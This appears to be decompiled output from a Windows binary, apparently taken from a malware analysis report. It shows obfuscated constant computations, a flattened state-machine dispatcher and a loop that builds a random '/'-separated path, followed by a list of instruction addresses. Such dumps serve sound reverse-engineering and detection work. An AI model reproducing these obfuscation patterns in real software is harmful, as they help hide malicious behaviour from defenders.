                                          				_t924 = 0x1c;
                                          				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
                                          				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
                                          				 *(_t950 + 0x8c) = 0x9ebc;
                                          				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
                                          				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
                                          				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
                                          				 *(_t950 + 0x124) = 0x986;
                                          				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
                                          				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
                                          				 *(_t950 + 0x84) = 0x3532;
                                          				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
                                          				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
                                          				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
                                          				 *(_t950 + 0xa4) = 0x41f;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
                                          				 *(_t950 + 0x108) = 0x3cbe;
                                          				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
                                          				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
                                          				 *(_t950 + 0x68) = 0xe725;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
                                          				 *(_t950 + 0xb8) = 0xbf58;
                                          				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
                                          				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
                                          				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
                                          				 *(_t950 + 0x100) = 0xd5da;
                                          				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
                                          				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
                                          				 *(_t950 + 0x54) = 0x395a;
                                          				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
                                          				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
                                          				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
                                          				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
                                          				 *(_t950 + 0xd4) = 0x77ed;
                                          				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
                                          				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
                                          				 *(_t950 + 0x114) = 0x68ca;
                                          				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
                                          				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
                                          				 *(_t950 + 0xdc) = 0x2f2e;
                                          				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
                                          				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
                                          				 *(_t950 + 0x24) = 0x5bdf;
                                          				_t925 = 0xa;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
                                          				_t926 = 0x47;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
                                          				 *(_t950 + 0x40) = 0xbbeb;
                                          				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
                                          				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
                                          				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
                                          				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
                                          				 *(_t950 + 0xb0) = 0x7d23;
                                          				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
                                          				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
                                          				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
                                          				 *(_t950 + 0x60) = 0xae03;
                                          				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
                                          				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
                                          				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
                                          				 *(_t950 + 0xe4) = 0xc6a2;
                                          				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
                                          				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
                                          				 *(_t950 + 0x5c) = 0xaf00;
                                          				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
                                          				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
                                          				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
                                          				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
                                          				 *(_t950 + 0x24) = 0xf54a;
                                          				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
                                          				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
                                          				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
                                          				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
                                          				 *(_t950 + 0x124) = 0xcc46;
                                          				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
                                          				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
                                          				 *(_t950 + 0x12c) = 0x5a4b;
                                          				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
                                          				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
                                          				 *(_t950 + 0x34) = 0x6135;
                                          				_t927 = 0xf;
                                          				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
                                          				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
                                          				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
                                          				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
                                          				 *(_t950 + 0xfc) = 0x664c;
                                          				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
                                          				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
                                          				 *(_t950 + 0x7c) = 0x54c3;
                                          				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
                                          				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
                                          				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
                                          				 *(_t950 + 0x28) = 0x1122;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
                                          				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
                                          				 *(_t950 + 0x40) = 0x14c1;
                                          				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
                                          				_t928 = 0x27;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
                                          				 *(_t950 + 0x3c) = 0x8f59;
                                          				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
                                          				_t929 = 7;
                                          				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
                                          				_t930 = 0x30;
                                          				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
                                          				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
                                          				 *(_t950 + 0x108) = 0x8114;
                                          				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
                                          				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
                                          				 *(_t950 + 0x68) = 0x1eec;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
                                          				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
                                          				 *(_t950 + 0x64) = 0x2753;
                                          				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
                                          				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
                                          				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
                                          				 *(_t950 + 0x1c) = 0xf5b7;
                                          				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
                                          				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
                                          				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
                                          				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
                                          				 *(_t950 + 0x38) = 0x2f43;
                                          				_t931 = 0x4b;
                                          				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
                                          				_t932 = 0x3a;
                                          				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
                                          				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
                                          				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
                                          				 *(_t950 + 0xf8) = 0xec82;
                                          				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
                                          				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
                                          				 *(_t950 + 0x94) = 0xef51;
                                          				_t933 = 0x32;
                                          				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
                                          				_t934 = 0x11;
                                          				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
                                          				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
                                          				 *(_t950 + 0xc8) = 0xb312;
                                          				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
                                          				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
                                          				 *(_t950 + 0x98) = 0x3fa5;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
                                          				 *(_t950 + 0x50) = 0xcffd;
                                          				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
                                          				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
                                          				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
                                          				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
                                          				 *(_t950 + 0xd8) = 0x2cbc;
                                          				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
                                          				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
                                          				 *(_t950 + 0x48) = 0xee7b;
                                          				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
                                          				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
                                          				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
                                          				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
                                          				 *(_t950 + 0xd0) = 0xc42e;
                                          				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
                                          				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
                                          				 *(_t950 + 0xcc) = 0xa2cf;
                                          				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
                                          				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
                                          				 *(_t950 + 0x11c) = 0xb9db;
                                          				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
                                          				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
                                          				 *(_t950 + 0x88) = 0xfaa3;
                                          				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
                                          				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
                                          				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
                                          				 *(_t950 + 0xc0) = 0xa294;
                                          				_t935 = 0x7e;
                                          				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
                                          				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
                                          				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
                                          				 *(_t950 + 0x80) = 0xa0b2;
                                          				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
                                          				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
                                          				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
                                          				 *(_t950 + 0x74) = 0x61f;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
                                          				 *(_t950 + 0x1c) = 0xc0d2;
                                          				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
                                          				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
                                          				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
                                          				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
                                          				 *(_t950 + 0x70) = 0xbc2e;
                                          				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
                                          				_t936 = 0x17;
                                          				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
                                          				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
                                          				 *(_t950 + 0xfc) = 0xf001;
                                          				_t937 = 0x14;
                                          				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
                                          				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
                                          				 *(_t950 + 0xc4) = 0x7c98;
                                          				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
                                          				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
                                          				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
                                          				 *(_t950 + 0xbc) = 0xfd89;
                                          				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
                                          				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
                                          				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
                                          				_t805 =  *(_t950 + 0x13c);
                                          				 *(_t950 + 0x10) =  *(_t950 + 0x140);
                                          				while(1) {
                                          					L1:
                                          					_t896 =  *(_t950 + 0x14);
                                          					while(1) {
                                          						L2:
                                          						while(1) {
                                          							L3:
                                          							_t954 = _t806 - 0x1dc05553;
                                          							if(_t954 > 0) {
                                          								goto L27;
                                          							}
                                          							L4:
                                          							if(_t954 == 0) {
                                          								_push( *((intOrPtr*)(_t950 + 0x120)));
                                          								E006C29E3(_t950 + 0x274, 0x400, E006D889D(0x6dc6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
                                          								_t950 = _t950 + 0x24;
                                          								E006D2025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
                                          								_t751 =  *(_t950 + 0x18);
                                          								_t806 = 0x23448a49;
                                          								while(1) {
                                          									L1:
                                          									_t896 =  *(_t950 + 0x14);
                                          									goto L2;
                                          								}
                                          							} else {
                                          								_t955 = _t806 - 0x160634a6;
                                          								if(_t955 > 0) {
                                          									__eflags = _t806 - 0x16d97506;
                                          									if(_t806 == 0x16d97506) {
                                          										E006CF536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
                                          										_t806 = 0x36d580c3;
                                          										goto L13;
                                          									} else {
                                          										__eflags = _t806 - 0x1a0940a4;
                                          										if(_t806 == 0x1a0940a4) {
                                          											E006C839D(_t950 + 0x170, _t917);
                                          											_t806 = 0x1dc05553;
                                          											goto L13;
                                          										} else {
                                          											__eflags = _t806 - 0x1a22d724;
                                          											if(_t806 != 0x1a22d724) {
                                          												goto L44;
                                          											} else {
                                          												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
                                          												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
                                          												_t832 = _t950 + 0x13c;
                                          												E006CC769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
                                          												_t950 = _t950 + 0x28;
                                          												asm("sbb ecx, ecx");
                                          												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
                                          												goto L13;
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									if(_t955 == 0) {
                                          										 *(_t950 + 0x160) = _t751;
                                          										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
                                          										 *(_t950 + 0x160) = _t805;
                                          										E006C96CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
                                          										_pop(_t836);
                                          										asm("sbb ecx, ecx");
                                          										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
                                          										goto L13;
                                          									} else {
                                          										if(_t806 == 0x6ef04) {
                                          											E006CF536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
                                          											_t806 = 0x16d97506;
                                          											goto L13;
                                          										} else {
                                          											if(_t806 == 0x9a9cbcb) {
                                          												_push(_t806);
                                          												_push( *((intOrPtr*)(_t917 + 4)));
                                          												_t941 = E006D78B7(_t806);
                                          												_t951 = _t950 + 4;
                                          												_t805 = E006C8736(_t780);
                                          												__eflags = _t805;
                                          												if(__eflags != 0) {
                                          													_t751 = E006D6B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
                                          													_t950 = _t951 + 0x14;
                                          													 *(_t950 + 0x10) = _t751;
                                          													__eflags = _t751;
                                          													if(__eflags == 0) {
                                          														_push(_t805);
                                          														_push( *(_t950 + 0xec));
                                          														_t903 =  *(_t950 + 0xf8);
                                          														_t817 =  *(_t950 + 0xbc);
                                          														L48:
                                          														E006CF536(_t817, _t903);
                                          													} else {
                                          														_t806 = 0x160634a6;
                                          														while(1) {
                                          															L1:
                                          															_t896 =  *(_t950 + 0x14);
                                          															goto L2;
                                          														}
                                          													}
                                          												}
                                          											} else {
                                          												if(_t806 == 0xb43f6cc) {
                                          													__eflags = E006D9B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
                                          													_t946 =  !=  ? 1 : _t946;
                                          													_t806 = 0x2a19e3bf;
                                          													 *(_t950 + 0x130) = _t946;
                                          													L13:
                                          													_t751 =  *(_t950 + 0x10);
                                          													goto L14;
                                          												} else {
                                          													_t959 = _t806 - 0x13765d88;
                                          													if(_t806 != 0x13765d88) {
                                          														L44:
                                          														__eflags = _t806 - 0x1a8884c7;
                                          														if(__eflags != 0) {
                                          															L14:
                                          															_t896 =  *(_t950 + 0x14);
                                          															continue;
                                          														}
                                          													} else {
                                          														_push( *(_t950 + 0x108));
                                          														_t787 = E006D889D(0x6dc660,  *(_t950 + 0xa8), _t959);
                                          														_t788 =  *0x6dca38; // 0x0
                                          														_t790 =  *0x6dca38; // 0x0
                                          														_t793 =  *0x6dca38; // 0x0
                                          														E006D7C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
                                          														_t950 = _t950 + 0x2c;
                                          														E006D2025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
                                          														_t799 =  *0x6dca38; // 0x0
                                          														_t806 = 0x261be6d7;
                                          														_t896 = ( *_t799)[4] & 0x0000ffff;
                                          														_t751 =  *(_t950 + 0x10);
                                          														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
                                          														L2:
                                          														L3:
                                          														_t954 = _t806 - 0x1dc05553;
                                          														if(_t954 > 0) {
                                          															goto L27;
                                          														}
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L49:
                                          							return _t946;
                                          							L27:
                                          							__eflags = _t806 - 0x23448a49;
                                          							if(_t806 == 0x23448a49) {
                                          								__eflags = E006D511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
                                          								if(__eflags == 0) {
                                          									_t806 = 0x6ef04;
                                          									goto L44;
                                          								} else {
                                          									_t806 = 0x1a22d724;
                                          									goto L13;
                                          								}
                                          							} else {
                                          								__eflags = _t806 - 0x261be6d7;
                                          								if(_t806 == 0x261be6d7) {
                                          									_t918 = _t950 + 0x270;
                                          									_t809 = 6;
                                          									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
                                          									__eflags = _t948;
                                          									while(__eflags != 0) {
                                          										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
                                          										E006CD6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
                                          										_t950 = _t950 + 0x18;
                                          										_t919 = _t918 + _t945 * 2;
                                          										_t803 = 0x2f;
                                          										 *_t919 = _t803;
                                          										_t918 = _t919 + 2;
                                          										_t948 = _t948 - 1;
                                          										__eflags = _t948;
                                          									}
                                          									_t946 =  *(_t950 + 0x130);
                                          									 *_t918 = 0;
                                          									_t806 = 0x1a0940a4;
                                          									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
                                          									goto L1;
                                          								} else {
                                          									__eflags = _t806 - 0x2a19e3bf;
                                          									if(_t806 == 0x2a19e3bf) {
                                          										E006CF536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
                                          										_t806 = 0x355eeb92;
                                          										goto L13;
                                          									} else {
                                          										__eflags = _t806 - 0x2ca20b85;
                                          										if(_t806 == 0x2ca20b85) {
                                          											 *(_t950 + 0x12c) = E006D8C8F(_t806);
                                          											_t806 = 0x9a9cbcb;
                                          											goto L13;
                                          										} else {
                                          											__eflags = _t806 - 0x355eeb92;
                                          											if(_t806 == 0x355eeb92) {
                                          												E006CF536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
                                          												_t806 = 0x6ef04;
                                          												goto L13;
                                          											} else {
                                          												__eflags = _t806 - 0x36d580c3;
                                          												if(_t806 == 0x36d580c3) {
                                          													_push(_t805);
                                          													_push( *(_t950 + 0xc0));
                                          													_t903 =  *(_t950 + 0xcc);
                                          													_t817 =  *(_t950 + 0x100);
                                          													goto L48;
                                          												} else {
                                          													__eflags = _t806 - 0x397d406a;
                                          													if(_t806 != 0x397d406a) {
                                          														goto L44;
                                          													} else {
                                          														_t820 =  *(_t950 + 0x118);
                                          														E006CF98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
                                          														_t950 = _t950 + 0x10;
                                          														asm("sbb ecx, ecx");
                                          														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
                                          														goto L13;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							goto L49;
                                          						}
                                          					}
                                          				}
                                          			}

















































                                          0x006ca8d6
                                          0x006ca8e1
                                          0x006ca8ec
                                          0x006ca8f7
                                          0x006ca902
                                          0x006ca90d
                                          0x006ca918
                                          0x006ca923
                                          0x006ca92b
                                          0x006ca936
                                          0x006ca941
                                          0x006ca955
                                          0x006ca95a
                                          0x006ca961
                                          0x006ca96c
                                          0x006ca977
                                          0x006ca982
                                          0x006ca989
                                          0x006ca991
                                          0x006ca99c
                                          0x006ca9a4
                                          0x006ca9ac
                                          0x006ca9b1
                                          0x006ca9b9
                                          0x006ca9c9
                                          0x006ca9cf
                                          0x006ca9d7
                                          0x006ca9df
                                          0x006ca9e7
                                          0x006ca9ef
                                          0x006ca9f8
                                          0x006ca9fd
                                          0x006caa03
                                          0x006caa0b
                                          0x006caa1e
                                          0x006caa1f
                                          0x006caa26
                                          0x006caa31
                                          0x006caa3c
                                          0x006caa44
                                          0x006caa4f
                                          0x006caa5a
                                          0x006caa65
                                          0x006caa79
                                          0x006caa80
                                          0x006caa92
                                          0x006caa99
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caaa1
                                          0x006caaa1
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaaa
                                          0x00000000
                                          0x00000000
                                          0x006caab0
                                          0x006caab0
                                          0x006cadbb
                                          0x006cae14
                                          0x006cae19
                                          0x006cae2d
                                          0x006cae32
                                          0x006cae38
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x00000000
                                          0x006caa9d
                                          0x006caab6
                                          0x006caab6
                                          0x006caabc
                                          0x006cace5
                                          0x006caceb
                                          0x006cadaa
                                          0x006cadb1
                                          0x00000000
                                          0x006cacf1
                                          0x006cacf1
                                          0x006cacf7
                                          0x006cad88
                                          0x006cad8d
                                          0x00000000
                                          0x006cacfd
                                          0x006cacfd
                                          0x006cad03
                                          0x00000000
                                          0x006cad09
                                          0x006cad10
                                          0x006cad26
                                          0x006cad2e
                                          0x006cad64
                                          0x006cad69
                                          0x006cad6e
                                          0x006cad76
                                          0x00000000
                                          0x006cad76
                                          0x006cad03
                                          0x006cacf7
                                          0x006caac2
                                          0x006caac2
                                          0x006cacac
                                          0x006cacbb
                                          0x006cacc2
                                          0x006cacc9
                                          0x006cacd1
                                          0x006cacd2
                                          0x006cacda
                                          0x00000000
                                          0x006caac8
                                          0x006caace
                                          0x006cac86
                                          0x006cac8d
                                          0x00000000
                                          0x006caad4
                                          0x006caada
                                          0x006cac01
                                          0x006cac02
                                          0x006cac0b
                                          0x006cac0d
                                          0x006cac29
                                          0x006cac2d
                                          0x006cac2f
                                          0x006cac4c
                                          0x006cac51
                                          0x006cac54
                                          0x006cac58
                                          0x006cac5a
                                          0x006cb013
                                          0x006cb014
                                          0x006cb01b
                                          0x006cb022
                                          0x006cb041
                                          0x006cb041
                                          0x006cac60
                                          0x006cac60
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x00000000
                                          0x006caa9d
                                          0x006caa9d
                                          0x006cac5a
                                          0x006caae0
                                          0x006caae6
                                          0x006cabcb
                                          0x006cabcf
                                          0x006cabd2
                                          0x006cabd7
                                          0x006cabde
                                          0x006cabde
                                          0x00000000
                                          0x006caaec
                                          0x006caaec
                                          0x006caaf2
                                          0x006cb006
                                          0x006cb006
                                          0x006cb00c
                                          0x006cabe2
                                          0x006cabe2
                                          0x00000000
                                          0x006cabe2
                                          0x006caaf8
                                          0x006caaf8
                                          0x006cab0b
                                          0x006cab12
                                          0x006cab3b
                                          0x006cab4e
                                          0x006cab6c
                                          0x006cab71
                                          0x006cab85
                                          0x006cab8a
                                          0x006cab91
                                          0x006cab98
                                          0x006cab9c
                                          0x006caba0
                                          0x006caaa1
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaaa
                                          0x00000000
                                          0x00000000
                                          0x006caaaa
                                          0x006caaf2
                                          0x006caae6
                                          0x006caada
                                          0x006caace
                                          0x006caac2
                                          0x006caabc
                                          0x006cb04a
                                          0x006cb054
                                          0x006cae42
                                          0x006cae42
                                          0x006cae48
                                          0x006cafef
                                          0x006caff1
                                          0x006cb001
                                          0x00000000
                                          0x006caff3
                                          0x006caff3
                                          0x00000000
                                          0x006caff3
                                          0x006cae4e
                                          0x006cae4e
                                          0x006cae54
                                          0x006caf59
                                          0x006caf64
                                          0x006caf69
                                          0x006caf69
                                          0x006caf6a
                                          0x006caf94
                                          0x006caf9b
                                          0x006cafa0
